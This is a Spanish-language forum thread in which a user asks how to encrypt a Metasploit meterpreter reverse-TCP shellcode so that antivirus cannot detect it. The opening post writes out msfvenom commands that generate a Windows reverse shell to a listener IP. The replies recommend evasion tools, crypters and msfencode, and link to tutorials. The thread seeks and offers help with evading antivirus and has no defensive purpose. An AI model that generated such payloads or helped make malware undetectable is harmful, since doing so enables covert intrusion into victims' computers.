Hola a todos!!! Bien, en esta ocasión tengo una duda que me está comiendo mucho la cabeza, por que busco y busco y no encuentro nada. Mi duda es que método o que hay que hacer para encriptar mi shellcode (de metasploit), he oído de alterar el shellcode pero no tengo ni idea de que hay que hacer, la shellcode a encriptar es la que me da de resultado al tipear lo siguiente en mi terminal: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.XXX LPORT=4444 C ó msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.XXX LPORT=4444 -f c > shell.c (en C, que vendría a arrojar los mismo)
Las "XXX" las pongo para no poner la ip completa.
Y después de esto, ¿que hago con la shellcode, para hacer un ejecutable de windows?
LA VERDAD SOLO QUIERO TENER MI PAYLOAD FUD.
Saludós!!!
Tenerlo fud es dificil, pues lo metodos de metasploit estan requemados, lo que si puedes hacer es emberlo en otro ejecutable, usar python,etc.
Por el foro hay un tuto del amigo sanko.
-Saludos-
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Tenerlo fud es dificil, pues lo metodos de metasploit estan requemados, lo que si puedes hacer es emberlo en otro ejecutable, usar python,etc.
Por el foro hay un tuto del amigo sanko.
-Saludos-
Hola, bueno aunque sea semi fud, no importa, ya he visto el post de sanko pero no lo entiendo muy bien, aun que esto corresponde comentarlo en su post jaja, pero bueno si me puedes decir metodos de encriptar este shellcode? Y una cosa este code que me da luego lo compilo con un compilador de C ?
Puede usar shinigami haciendo uso de msfvenom ;)
http://www.sniferl4bs.com/2013/01/evadiendo-avs-con-python.html
Vale muchas gracias por su ayuda, pero aparte de este método, ¿no hay más? ¿Podría funcionar con algún cryper? Por favor, proporcionarme si podéis los mejores métodos.
Puedes usar avoid o Voil que igual te ayudara ;) ademas sin pasar el ejecutable a py2exe lo puedes hacer desde el metasploit ;)
Regards,
Snifer
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Puedes usar avoid o Voil que igual te ayudara ;) ademas sin pasar el ejecutable a py2exe lo puedes hacer desde el metasploit ;)
Regards,
Snifer
¿Podrías proporcionar algún tutorial? Muchas gracias!!
Por acá (http://www.commonexploits.com/?p=789) te dejo uno que te servirá, un saludo ;)
Muchas gracias por la información, ¿los payloads tambien se pueden encriptar con un crypter?
Saludos.
Una recomendacion antes de todo no se dice encriptar ya que no existe el termino si no es cifrar!
No es posible porq.
Date un paso por
acá (http://www.offensive-security.com/metasploit-unleashed/Msfencode)..
Te daré una pista
~$ msfencode ;)
EDIT: Por acá te dejo un vídeo que también podría ayudarte.